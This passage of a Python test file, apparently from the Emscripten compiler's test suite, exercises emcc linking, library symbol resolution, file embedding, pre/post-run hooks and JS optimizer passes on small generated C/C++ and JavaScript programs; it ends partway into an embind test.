def test_multiply_defined_libsymbols(self):
lib = "int mult() { return 1; }"
lib_name = os.path.join(self.get_dir(), 'libA.c')
open(lib_name, 'w').write(lib)
a2 = "void x() {}"
a2_name = os.path.join(self.get_dir(), 'a2.c')
open(a2_name, 'w').write(a2)
b2 = "void y() {}"
b2_name = os.path.join(self.get_dir(), 'b2.c')
open(b2_name, 'w').write(b2)
main = r'''
#include <stdio.h>
int mult();
int main() {
printf("result: %d\n", mult());
return 0;
}
'''
main_name = os.path.join(self.get_dir(), 'main.c')
open(main_name, 'w').write(main)
Building.emcc(lib_name, output_filename='libA.so')
Building.emcc(a2_name, ['-L.', '-lA'])
Building.emcc(b2_name, ['-L.', '-lA'])
Building.emcc(main_name, ['-L.', '-lA', a2_name+'.o', b2_name+'.o'], output_filename='a.out.js')
self.assertContained('result: 1', run_js(os.path.join(self.get_dir(), 'a.out.js')))
def test_multiply_defined_libsymbols_2(self):
a = "int x() { return 55; }"
a_name = os.path.join(self.get_dir(), 'a.c')
open(a_name, 'w').write(a)
b = "int y() { return 2; }"
b_name = os.path.join(self.get_dir(), 'b.c')
open(b_name, 'w').write(b)
c = "int z() { return 5; }"
c_name = os.path.join(self.get_dir(), 'c.c')
open(c_name, 'w').write(c)
main = r'''
#include <stdio.h>
int x();
int y();
int z();
int main() {
printf("result: %d\n", x() + y() + z());
return 0;
}
'''
main_name = os.path.join(self.get_dir(), 'main.c')
open(main_name, 'w').write(main)
Building.emcc(a_name) # a.c.o
Building.emcc(b_name) # b.c.o
Building.emcc(c_name) # c.c.o
lib_name = os.path.join(self.get_dir(), 'libLIB.a')
Building.emar('cr', lib_name, [a_name + '.o', b_name + '.o']) # libLIB.a with a and b
# a is in the lib AND in an .o, so should be ignored in the lib. We do still need b from the lib though
Building.emcc(main_name, ['-L.', '-lLIB', a_name+'.o', c_name + '.o'], output_filename='a.out.js')
self.assertContained('result: 62', run_js(os.path.join(self.get_dir(), 'a.out.js')))
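# As in native linking, .o files on the command line are always linked in,
# while archive members are only pulled in to resolve undefined symbols;
# that is why the archive's copy of a is skipped here while b is used.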
def test_redundant_link(self):
lib = "int mult() { return 1; }"
lib_name = os.path.join(self.get_dir(), 'libA.c')
open(lib_name, 'w').write(lib)
main = r'''
#include <stdio.h>
int mult();
int main() {
printf("result: %d\n", mult());
return 0;
}
'''
main_name = os.path.join(self.get_dir(), 'main.c')
open(main_name, 'w').write(main)
Building.emcc(lib_name, output_filename='libA.so')
Building.emcc(main_name, ['libA.so']*2, output_filename='a.out.js')
self.assertContained('result: 1', run_js(os.path.join(self.get_dir(), 'a.out.js')))
def test_export_all(self):
lib = r'''
#include <stdio.h>
void libf1() { printf("libf1\n"); }
void libf2() { printf("libf2\n"); }
'''
lib_name = os.path.join(self.get_dir(), 'lib.c')
open(lib_name, 'w').write(lib)
open('main.js', 'w').write('''
_libf1();
_libf2();
''')
Building.emcc(lib_name, ['-s', 'EXPORT_ALL=1', '--post-js', 'main.js'], output_filename='a.out.js')
self.assertContained('libf1\nlibf2\n', run_js(os.path.join(self.get_dir(), 'a.out.js')))
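# EXPORT_ALL keeps every compiled function reachable under its underscored
# name, which is what lets the --post-js code above call _libf1/_libf2 directly.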
def test_abspaths(self):
# Includes with absolute paths are generally dangerous; things like -I/usr/.. will reach local system headers, not our portable ones.
shutil.copyfile(path_from_root('tests', 'hello_world.c'), 'main.c')
for args, expected in [(['-I/usr/something'], True),
(['-L/usr/something'], True),
(['-Isubdir/something'], False),
(['-Lsubdir/something'], False),
([], False)]:
err = Popen([PYTHON, EMCC, 'main.c'] + args, stderr=PIPE).communicate()[1]
assert ('encountered. If this is to a local system header/library, it may cause problems (local system files make sense for compiling natively on your system, but not necessarily to JavaScript)' in err) == expected, err
def test_local_link(self):
# Linking a local library directly, like /usr/lib/libsomething.so, cannot work of course, since it
# doesn't contain bitcode. However, when we see that, we should look for a bitcode file for that
# library in the -L paths and system/lib
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write('''
extern void printey();
int main() {
printey();
return 0;
}
''')
try:
os.makedirs(os.path.join(self.get_dir(), 'subdir'))
except:
pass
open(os.path.join(self.get_dir(), 'subdir', 'libfile.so'), 'w').write('this is not llvm bitcode!')
open(os.path.join(self.get_dir(), 'libfile.cpp'), 'w').write('''
#include <stdio.h>
void printey() {
printf("hello from lib\\n");
}
''')
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'libfile.cpp'), '-o', 'libfile.so']).communicate()
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), os.path.join(self.get_dir(), 'subdir', 'libfile.so'), '-L.'], stderr=PIPE).communicate()
self.assertContained('hello from lib', run_js(os.path.join(self.get_dir(), 'a.out.js')))
def test_runtimelink_multi(self):
return self.skip('shared libs are deprecated')
if Settings.ASM_JS: return self.skip('asm does not support runtime linking yet')
if SPIDERMONKEY_ENGINE not in JS_ENGINES: return self.skip('cannot run without spidermonkey due to node limitations')
open('testa.h', 'w').write(r'''
#ifndef _TESTA_H_
#define _TESTA_H_
class TestA {
public:
TestA();
};
#endif
''')
open('testb.h', 'w').write(r'''
#ifndef _TESTB_H_
#define _TESTB_H_
class TestB {
public:
TestB();
};
#endif
''')
open('testa.cpp', 'w').write(r'''
#include <stdio.h>
#include <testa.h>
TestA::TestA() {
printf("TestA\n");
}
''')
open('testb.cpp', 'w').write(r'''
#include <stdio.h>
#include <testb.h>
#include <testa.h>
/*
*/
TestB::TestB() {
printf("TestB\n");
TestA* testa = new TestA();
}
''')
open('main.cpp', 'w').write(r'''
#include <stdio.h>
#include <testa.h>
#include <testb.h>
/*
*/
int main(int argc, char** argv) {
printf("Main\n");
TestA* testa = new TestA();
TestB* testb = new TestB();
}
''')
Popen([PYTHON, EMCC, 'testa.cpp', '-o', 'liba.js', '-s', 'BUILD_AS_SHARED_LIB=2', '-s', 'LINKABLE=1', '-s', 'NAMED_GLOBALS=1', '-I.']).communicate()
Popen([PYTHON, EMCC, 'testb.cpp', '-o', 'libb.js', '-s', 'BUILD_AS_SHARED_LIB=2', '-s', 'LINKABLE=1', '-s', 'NAMED_GLOBALS=1', '-I.']).communicate()
Popen([PYTHON, EMCC, 'main.cpp', '-o', 'main.js', '-s', 'RUNTIME_LINKED_LIBS=["liba.js", "libb.js"]', '-s', 'NAMED_GLOBALS=1', '-I.', '-s', 'LINKABLE=1']).communicate()
Popen([PYTHON, EMCC, 'main.cpp', 'testa.cpp', 'testb.cpp', '-o', 'full.js', '-I.']).communicate()
self.assertContained('TestA\nTestB\nTestA\n', run_js('main.js', engine=SPIDERMONKEY_ENGINE))
def test_js_libraries(self):
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write('''
#include <stdio.h>
extern "C" {
extern void printey();
extern int calcey(int x, int y);
}
int main() {
printey();
printf("*%d*\\n", calcey(10, 22));
return 0;
}
''')
open(os.path.join(self.get_dir(), 'mylib1.js'), 'w').write('''
mergeInto(LibraryManager.library, {
printey: function() {
Module.print('hello from lib!');
}
});
''')
open(os.path.join(self.get_dir(), 'mylib2.js'), 'w').write('''
mergeInto(LibraryManager.library, {
calcey: function(x, y) {
return x + y;
}
});
''')
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--js-library', os.path.join(self.get_dir(), 'mylib1.js'),
'--js-library', os.path.join(self.get_dir(), 'mylib2.js')]).communicate()
self.assertContained('hello from lib!\n*32*\n', run_js(os.path.join(self.get_dir(), 'a.out.js')))
def test_identical_basenames(self):
# Issue 287: files in different dirs but with the same basename get confused as the same,
# causing multiply defined symbol errors
try:
os.makedirs(os.path.join(self.get_dir(), 'foo'))
except:
pass
try:
os.makedirs(os.path.join(self.get_dir(), 'bar'))
except:
pass
open(os.path.join(self.get_dir(), 'foo', 'main.cpp'), 'w').write('''
extern void printey();
int main() {
printey();
return 0;
}
''')
open(os.path.join(self.get_dir(), 'bar', 'main.cpp'), 'w').write('''
#include<stdio.h>
void printey() { printf("hello there\\n"); }
''')
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'foo', 'main.cpp'), os.path.join(self.get_dir(), 'bar', 'main.cpp')]).communicate()
self.assertContained('hello there', run_js(os.path.join(self.get_dir(), 'a.out.js')))
# ditto with first creating .o files
try_delete(os.path.join(self.get_dir(), 'a.out.js'))
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'foo', 'main.cpp'), '-o', os.path.join(self.get_dir(), 'foo', 'main.o')]).communicate()
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'bar', 'main.cpp'), '-o', os.path.join(self.get_dir(), 'bar', 'main.o')]).communicate()
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'foo', 'main.o'), os.path.join(self.get_dir(), 'bar', 'main.o')]).communicate()
self.assertContained('hello there', run_js(os.path.join(self.get_dir(), 'a.out.js')))
def test_main_a(self):
# if main() is in a .a, we need to pull in that .a
main_name = os.path.join(self.get_dir(), 'main.c')
open(main_name, 'w').write(r'''
#include <stdio.h>
extern int f();
int main() {
printf("result: %d.\n", f());
return 0;
}
''')
other_name = os.path.join(self.get_dir(), 'other.c')
open(other_name, 'w').write(r'''
#include <stdio.h>
int f() { return 12346; }
''')
Popen([PYTHON, EMCC, main_name, '-c', '-o', main_name+'.bc']).communicate()
Popen([PYTHON, EMCC, other_name, '-c', '-o', other_name+'.bc']).communicate()
Popen([PYTHON, EMAR, 'cr', main_name+'.a', main_name+'.bc']).communicate()
Popen([PYTHON, EMCC, other_name+'.bc', main_name+'.a']).communicate()
self.assertContained('result: 12346.', run_js(os.path.join(self.get_dir(), 'a.out.js')))
def test_dup_o_in_a(self):
open('common.c', 'w').write(r'''
#include <stdio.h>
void a(void) {
printf("a\n");
}
''')
Popen([PYTHON, EMCC, 'common.c', '-c', '-o', 'common.o']).communicate()
Popen([PYTHON, EMAR, 'rc', 'liba.a', 'common.o']).communicate()
open('common.c', 'w').write(r'''
#include <stdio.h>
void b(void) {
printf("b\n");
}
''')
Popen([PYTHON, EMCC, 'common.c', '-c', '-o', 'common.o']).communicate()
Popen([PYTHON, EMAR, 'rc', 'libb.a', 'common.o']).communicate()
open('main.c', 'w').write(r'''
void a(void);
void b(void);
int main() {
a();
b();
}
''')
Popen([PYTHON, EMCC, 'main.c', '-L.', '-la', '-lb']).communicate()
self.assertContained('a\nb\n', run_js(os.path.join(self.get_dir(), 'a.out.js')))
def test_embed_file(self):
open(os.path.join(self.get_dir(), 'somefile.txt'), 'w').write('''hello from a file with lots of data and stuff in it thank you very much''')
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(r'''
#include <stdio.h>
int main() {
FILE *f = fopen("somefile.txt", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%s|\n", buf);
return 0;
}
''')
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--embed-file', 'somefile.txt']).communicate()
self.assertContained('|hello from a file wi|', run_js(os.path.join(self.get_dir(), 'a.out.js')))
# embed the same file twice; this should not error
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--embed-file', 'somefile.txt', '--embed-file', 'somefile.txt']).communicate()
self.assertContained('|hello from a file wi|', run_js(os.path.join(self.get_dir(), 'a.out.js')))
def test_embed_file_dup(self):
try_delete(os.path.join(self.get_dir(), 'tst'))
os.mkdir(os.path.join(self.get_dir(), 'tst'))
os.mkdir(os.path.join(self.get_dir(), 'tst', 'test1'))
os.mkdir(os.path.join(self.get_dir(), 'tst', 'test2'))
open(os.path.join(self.get_dir(), 'tst', 'aa.txt'), 'w').write('''frist''')
open(os.path.join(self.get_dir(), 'tst', 'test1', 'aa.txt'), 'w').write('''sacond''')
open(os.path.join(self.get_dir(), 'tst', 'test2', 'aa.txt'), 'w').write('''thard''')
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(r'''
#include <stdio.h>
#include <string.h>
void print_file(const char *name) {
FILE *f = fopen(name, "r");
char buf[100];
memset(buf, 0, 100);
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%s|\n", buf);
}
int main() {
print_file("tst/aa.txt");
print_file("tst/test1/aa.txt");
print_file("tst/test2/aa.txt");
return 0;
}
''')
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--embed-file', 'tst']).communicate()
self.assertContained('|frist|\n|sacond|\n|thard|\n', run_js(os.path.join(self.get_dir(), 'a.out.js')))
def test_multidynamic_link(self):
# Linking in the same dynamic library twice would normally error, since we statically link it, causing duplicate symbols.
# A workaround is to use --ignore-dynamic-linking; see emcc --help for details
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(r'''
#include <stdio.h>
extern void printey();
extern void printother();
int main() {
printf("*");
printey();
printf("\n");
printother();
printf("\n");
printf("*");
return 0;
}
''')
try:
os.makedirs(os.path.join(self.get_dir(), 'libdir'))
except:
pass
open(os.path.join(self.get_dir(), 'libdir', 'libfile.cpp'), 'w').write('''
#include <stdio.h>
void printey() {
printf("hello from lib");
}
''')
open(os.path.join(self.get_dir(), 'libdir', 'libother.cpp'), 'w').write('''
#include <stdio.h>
extern void printey();
void printother() {
printf("|");
printey();
printf("|");
}
''')
# This lets us link the same dynamic lib twice. We will need to link it in manually at the end.
compiler = [PYTHON, EMCC, '--ignore-dynamic-linking']
# Build libfile normally into an .so
Popen(compiler + [os.path.join(self.get_dir(), 'libdir', 'libfile.cpp'), '-o', os.path.join(self.get_dir(), 'libdir', 'libfile.so')]).communicate()
# Build libother and dynamically link it to libfile - but add --ignore-dynamic-linking
Popen(compiler + [os.path.join(self.get_dir(), 'libdir', 'libother.cpp'), '-L' + os.path.join(self.get_dir(), 'libdir'), '-lfile', '-o', os.path.join(self.get_dir(), 'libdir', 'libother.so')]).communicate()
# Build the main file, linking in both the libs
Popen(compiler + [os.path.join(self.get_dir(), 'main.cpp'), '-L' + os.path.join(self.get_dir(), 'libdir'), '-lfile', '-lother', '-c']).communicate()
# The normal build system is over. We need to do an additional step to link in the dynamic libraries, since we ignored them before
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.o'), '-L' + os.path.join(self.get_dir(), 'libdir'), '-lfile', '-lother']).communicate()
self.assertContained('*hello from lib\n|hello from lib|\n*', run_js(os.path.join(self.get_dir(), 'a.out.js')))
def test_js_link(self):
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write('''
#include <stdio.h>
int main() {
printf("hello from main\\n");
return 0;
}
''')
open(os.path.join(self.get_dir(), 'before.js'), 'w').write('''
var MESSAGE = 'hello from js';
if (typeof Module != 'undefined') throw 'This code should run before anything else!';
''')
open(os.path.join(self.get_dir(), 'after.js'), 'w').write('''
Module.print(MESSAGE);
''')
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--pre-js', 'before.js', '--post-js', 'after.js']).communicate()
self.assertContained('hello from main\nhello from js\n', run_js(os.path.join(self.get_dir(), 'a.out.js')))
def test_sdl_endianness(self):
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(r'''
#include <stdio.h>
#include <SDL/SDL.h>
int main() {
printf("%d, %d, %d\n", SDL_BYTEORDER, SDL_LIL_ENDIAN, SDL_BIG_ENDIAN);
return 0;
}
''')
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp')]).communicate()
self.assertContained('1234, 1234, 4321\n', run_js(os.path.join(self.get_dir(), 'a.out.js')))
def test_link_memcpy(self):
# memcpy can show up *after* optimizations, so after our opportunity to link in libc, so it must be special-cased
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(r'''
#include <stdio.h>
int main(int argc, char **argv) {
int num = argc + 10;
char buf[num], buf2[num];
for (int i = 0; i < num; i++) {
buf[i] = i*i+i/3;
}
for (int i = 1; i < num; i++) {
buf[i] += buf[i-1];
}
for (int i = 0; i < num; i++) {
buf2[i] = buf[i];
}
for (int i = 1; i < num; i++) {
buf2[i] += buf2[i-1];
}
for (int i = 0; i < num; i++) {
printf("%d:%d\n", i, buf2[i]);
}
return 0;
}
''')
Popen([PYTHON, EMCC, '-O2', os.path.join(self.get_dir(), 'main.cpp')]).communicate()
output = run_js(os.path.join(self.get_dir(), 'a.out.js'), full_output=True, stderr=PIPE)
self.assertContained('''0:0
1:1
2:6
3:21
4:53
5:111
6:-49
7:98
8:55
9:96
10:-16
''', output)
self.assertNotContained('warning: library.js memcpy should not be running, it is only for testing!', output)
def test_warn_undefined(self):
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(r'''
#include <stdio.h>
extern "C" {
void something();
}
int main() {
something();
return 0;
}
''')
def clear(): try_delete('a.out.js')
for args in [[], ['-O2']]:
clear()
print 'warn', args
output = Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '-s', 'WARN_ON_UNDEFINED_SYMBOLS=1'] + args, stderr=PIPE).communicate()
self.assertContained('unresolved symbol: something', output[1])
clear()
output = Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp')] + args, stderr=PIPE).communicate()
self.assertNotContained('unresolved symbol: something\n', output[1])
for args in [[], ['-O2']]:
clear()
print 'error', args
output = Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '-s', 'ERROR_ON_UNDEFINED_SYMBOLS=1'] + args, stderr=PIPE).communicate()
self.assertContained('unresolved symbol: something', output[1])
assert not os.path.exists('a.out.js')
clear()
output = Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp')] + args, stderr=PIPE).communicate()
self.assertNotContained('unresolved symbol: something\n', output[1])
assert os.path.exists('a.out.js')
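# Note the asymmetry the two loops above check: WARN_ON_UNDEFINED_SYMBOLS=1 still
# emits a.out.js alongside the warning, while ERROR_ON_UNDEFINED_SYMBOLS=1 aborts
# the link, so no output file may exist afterwards.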
def test_toobig(self):
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(r'''
#include <stdio.h>
#define BYTES 100*1024*1024
int main(int argc, char **argv) {
if (argc == 100) {
static char buf[BYTES];
static char buf2[BYTES];
for (int i = 0; i < BYTES; i++) {
buf[i] = i*i;
buf2[i] = i/3;
}
for (int i = 0; i < BYTES; i++) {
buf[i] = buf2[i/2];
buf2[i] = buf[i/3];
}
printf("%d\n", buf[10] + buf2[20]);
}
return 0;
}
''')
output = Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp')], stderr=PIPE).communicate()[1]
assert 'Emscripten failed' in output, output
assert 'warning: very large fixed-size structural type' in output, output
def test_prepost(self):
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write('''
#include <stdio.h>
int main() {
printf("hello from main\\n");
return 0;
}
''')
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
var Module = {
preRun: function() { Module.print('pre-run') },
postRun: function() { Module.print('post-run') }
};
''')
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--pre-js', 'pre.js']).communicate()
self.assertContained('pre-run\nhello from main\npost-run\n', run_js(os.path.join(self.get_dir(), 'a.out.js')))
# never run, so no preRun or postRun
src = open(os.path.join(self.get_dir(), 'a.out.js')).read().replace('// {{PRE_RUN_ADDITIONS}}', 'addRunDependency()')
open(os.path.join(self.get_dir(), 'a.out.js'), 'w').write(src)
self.assertNotContained('pre-run\nhello from main\npost-run\n', run_js(os.path.join(self.get_dir(), 'a.out.js')))
# noInitialRun prevents run
for no_initial_run, run_dep in [(0, 0), (1, 0), (0, 1)]:
print no_initial_run, run_dep
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp')]).communicate()
src = 'var Module = { noInitialRun: %d };\n' % no_initial_run + open(os.path.join(self.get_dir(), 'a.out.js')).read()
if run_dep:
src = src.replace('// {{PRE_RUN_ADDITIONS}}', '// {{PRE_RUN_ADDITIONS}}\naddRunDependency("test");') \
.replace('// {{POST_RUN_ADDITIONS}}', '// {{POST_RUN_ADDITIONS}}\nremoveRunDependency("test");')
open(os.path.join(self.get_dir(), 'a.out.js'), 'w').write(src)
assert ('hello from main' in run_js(os.path.join(self.get_dir(), 'a.out.js'))) != no_initial_run, 'only run if no noInitialRun'
if no_initial_run:
# Calling main later should still work, filesystem etc. must be set up.
print 'call main later'
src = open(os.path.join(self.get_dir(), 'a.out.js')).read() + '\nModule.callMain();\n'
open(os.path.join(self.get_dir(), 'a.out.js'), 'w').write(src)
assert 'hello from main' in run_js(os.path.join(self.get_dir(), 'a.out.js')), 'main should print when called manually'
# Use postInit
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
var Module = {
preRun: function() { Module.print('pre-run') },
postRun: function() { Module.print('post-run') },
preInit: function() { Module.print('pre-init') }
};
''')
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--pre-js', 'pre.js']).communicate()
self.assertContained('pre-init\npre-run\nhello from main\npost-run\n', run_js(os.path.join(self.get_dir(), 'a.out.js')))
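# Illustrative sketch (not part of the test): the addRunDependency /
# removeRunDependency pair exercised above is just a counter that holds off
# run() until it drops back to zero. A minimal Python analogue:
def _run_dependency_sketch(run):
  state = {'deps': 0}
  def add_run_dependency():
    state['deps'] += 1
  def remove_run_dependency():
    state['deps'] -= 1
    if state['deps'] == 0:
      run() # all dependencies met, safe to start main()
  return add_run_dependency, remove_run_dependency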
def test_prepost2(self):
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write('''
#include <stdio.h>
int main() {
printf("hello from main\\n");
return 0;
}
''')
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
var Module = {
preRun: function() { Module.print('pre-run') },
};
''')
open(os.path.join(self.get_dir(), 'pre2.js'), 'w').write('''
Module.postRun = function() { Module.print('post-run') };
''')
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--pre-js', 'pre.js', '--pre-js', 'pre2.js']).communicate()
self.assertContained('pre-run\nhello from main\npost-run\n', run_js(os.path.join(self.get_dir(), 'a.out.js')))
def test_prepre(self):
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write('''
#include <stdio.h>
int main() {
printf("hello from main\\n");
return 0;
}
''')
open(os.path.join(self.get_dir(), 'pre.js'), 'w').write('''
var Module = {
preRun: [function() { Module.print('pre-run') }],
};
''')
open(os.path.join(self.get_dir(), 'pre2.js'), 'w').write('''
Module.preRun.push(function() { Module.print('prepre') });
''')
Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--pre-js', 'pre.js', '--pre-js', 'pre2.js']).communicate()
self.assertContained('prepre\npre-run\nhello from main\n', run_js(os.path.join(self.get_dir(), 'a.out.js')))
def test_save_bc(self):
for save in [0, 1]:
self.clear()
Popen([PYTHON, EMCC, path_from_root('tests', 'hello_world_loop_malloc.cpp')] + ([] if not save else ['--save-bc', self.in_dir('my_bitcode.bc')])).communicate()
assert 'hello, world!' in run_js(self.in_dir('a.out.js'))
assert os.path.exists(self.in_dir('my_bitcode.bc')) == save
if save:
try_delete('a.out.js')
Building.llvm_dis(self.in_dir('my_bitcode.bc'), self.in_dir('my_ll.ll'))
try:
os.environ['EMCC_LEAVE_INPUTS_RAW'] = '1'
Popen([PYTHON, EMCC, 'my_ll.ll', '-o', 'two.js']).communicate()
assert 'hello, world!' in run_js(self.in_dir('two.js'))
finally:
del os.environ['EMCC_LEAVE_INPUTS_RAW']
def test_fix_closure(self):
input = path_from_root('tests', 'test-fix-closure.js')
expected = path_from_root('tests', 'test-fix-closure.out.js')
Popen([PYTHON, path_from_root('tools', 'fix_closure.py'), input, 'out.js']).communicate()
output = open('out.js').read()
assert '0,zzz_Q_39fa,0' in output
assert 'function(a,c)' not in output # should be uninlined, so it gets a name
assert run_js(input) == run_js('out.js')
def test_js_optimizer(self):
for input, expected, passes in [
(path_from_root('tools', 'test-js-optimizer.js'), open(path_from_root('tools', 'test-js-optimizer-output.js')).read(),
['hoistMultiples', 'loopOptimizer', 'removeAssignsToUndefined', 'simplifyExpressionsPre', 'simplifyExpressionsPost']),
(path_from_root('tools', 'test-js-optimizer-t2c.js'), open(path_from_root('tools', 'test-js-optimizer-t2c-output.js')).read(),
['simplifyExpressionsPre', 'optimizeShiftsConservative']),
(path_from_root('tools', 'test-js-optimizer-t2.js'), open(path_from_root('tools', 'test-js-optimizer-t2-output.js')).read(),
['simplifyExpressionsPre', 'optimizeShiftsAggressive']),
# Make sure that optimizeShifts handles functions with shift statements.
(path_from_root('tools', 'test-js-optimizer-t3.js'), open(path_from_root('tools', 'test-js-optimizer-t3-output.js')).read(),
['optimizeShiftsAggressive']),
(path_from_root('tools', 'test-js-optimizer-regs.js'), open(path_from_root('tools', 'test-js-optimizer-regs-output.js')).read(),
['registerize']),
(path_from_root('tools', 'eliminator', 'eliminator-test.js'), open(path_from_root('tools', 'eliminator', 'eliminator-test-output.js')).read(),
['eliminate']),
(path_from_root('tools', 'eliminator', 'safe-eliminator-test.js'), open(path_from_root('tools', 'eliminator', 'safe-eliminator-test-output.js')).read(),
['eliminateMemSafe']),
(path_from_root('tools', 'eliminator', 'asm-eliminator-test.js'), open(path_from_root('tools', 'eliminator', 'asm-eliminator-test-output.js')).read(),
['asm', 'eliminate']),
(path_from_root('tools', 'test-js-optimizer-asm-regs.js'), open(path_from_root('tools', 'test-js-optimizer-asm-regs-output.js')).read(),
['asm', 'registerize']),
(path_from_root('tools', 'test-js-optimizer-asm-regs-min.js'), open(path_from_root('tools', 'test-js-optimizer-asm-regs-min-output.js')).read(),
['asm', 'registerize']),
(path_from_root('tools', 'test-js-optimizer-asm-pre.js'), open(path_from_root('tools', 'test-js-optimizer-asm-pre-output.js')).read(),
['asm', 'simplifyExpressionsPre']),
(path_from_root('tools', 'test-js-optimizer-asm-last.js'), open(path_from_root('tools', 'test-js-optimizer-asm-last-output.js')).read(),
['asm', 'last']),
(path_from_root('tools', 'test-js-optimizer-asm-relocate.js'), open(path_from_root('tools', 'test-js-optimizer-asm-relocate-output.js')).read(),
['asm', 'relocate']),
#(path_from_root('tools', 'test-js-optimizer-asm-outline.js'), open(path_from_root('tools', 'test-js-optimizer-asm-outline-output.js')).read(),
# ['asm', 'outline']),
]:
print input
output = Popen(listify(NODE_JS) + [path_from_root('tools', 'js-optimizer.js'), input] + passes, stdin=PIPE, stdout=PIPE).communicate()[0]
self.assertIdentical(expected, output.replace('\r\n', '\n').replace('\n\n', '\n'))
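# The output normalization above (collapsing \r\n and doubled newlines) keeps the
# comparison stable across platforms; as a standalone helper it would be:
def _normalize_optimizer_output_sketch(text):
  return text.replace('\r\n', '\n').replace('\n\n', '\n')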
def test_m_mm(self):
open(os.path.join(self.get_dir(), 'foo.c'), 'w').write('''#include <emscripten.h>''')
for opt in ['M', 'MM']:
output, err = Popen([PYTHON, EMCC, os.path.join(self.get_dir(), 'foo.c'), '-' + opt], stdout=PIPE, stderr=PIPE).communicate()
assert 'foo.o: ' in output, '-%s failed to produce the right output: %s' % (opt, output)
assert 'error' not in err, 'Unexpected stderr: ' + err
def test_chunking(self):
if os.environ.get('EMCC_DEBUG'): return self.skip('cannot run in debug mode')
if os.environ.get('EMCC_CORES'): return self.skip('cannot run if cores are altered')
if multiprocessing.cpu_count() < 2: return self.skip('need multiple cores')
try:
os.environ['EMCC_DEBUG'] = '1'
os.environ['EMCC_CORES'] = '2'
for asm, linkable, chunks, js_chunks in [
(0, 0, 3, 2), (0, 1, 3, 4),
(1, 0, 3, 2), (1, 1, 3, 4)
]:
print asm, linkable, chunks, js_chunks
output, err = Popen([PYTHON, EMCC, path_from_root('tests', 'hello_libcxx.cpp'), '-O1', '-s', 'LINKABLE=%d' % linkable, '-s', 'ASM_JS=%d' % asm] + (['-O2'] if asm else []), stdout=PIPE, stderr=PIPE).communicate()
ok = False
for c in range(chunks, chunks+2):
ok = ok or ('phase 2 working on %d chunks' % c in err)
assert ok, err
ok = False
for c in range(js_chunks, js_chunks+2):
ok = ok or ('splitting up js optimization into %d chunks' % c in err)
assert ok, err
finally:
del os.environ['EMCC_DEBUG']
del os.environ['EMCC_CORES']
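# The range(chunks, chunks+2) scans above deliberately accept an off-by-one in the
# reported chunk count, since chunking decisions can shift slightly with code size;
# the test pins the ballpark, not the exact number.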
def test_debuginfo(self):
if os.environ.get('EMCC_DEBUG'): return self.skip('cannot run in debug mode')
try:
os.environ['EMCC_DEBUG'] = '1'
# llvm debug info is kept only when we can see it, which is without the js optimizer, i.e. -O0. js debug info is lost to registerize in -O2, so -g disables registerize there
for args, expect_llvm, expect_js in [
(['-O0'], True, True),
(['-O0', '-g'], True, True),
(['-O1'], False, True),
(['-O1', '-g'], False, True),
(['-O2'], False, False),
(['-O2', '-g'], False, True),
]:
print args, expect_llvm, expect_js
output, err = Popen([PYTHON, EMCC, path_from_root('tests', 'hello_world.cpp')] + args, stdout=PIPE, stderr=PIPE).communicate()
assert expect_llvm == ('strip-debug' not in err)
assert expect_js == ('registerize' not in err)
finally:
del os.environ['EMCC_DEBUG']
def test_scons(self): # also incidentally tests c++11 integration in llvm 3.1
try_delete(os.path.join(self.get_dir(), 'test'))
shutil.copytree(path_from_root('tests', 'scons'), os.path.join(self.get_dir(), 'test'))
shutil.copytree(path_from_root('tools', 'scons', 'site_scons'), os.path.join(self.get_dir(), 'test', 'site_scons'))
os.chdir(os.path.join(self.get_dir(), 'test'))
Popen(['scons']).communicate()
output = run_js('scons_integration.js')
assert 'If you see this - the world is all right!' in output
def test_embind(self):
for args, fail in [
([], True), # without --bind, we fail
(['--bind'], False),
(['--bind', '-O1'], False),
(['--bind', '-O2'], False)
]:
print args, fail
self.clear()
try_delete(self.in_dir('a.out.js'))
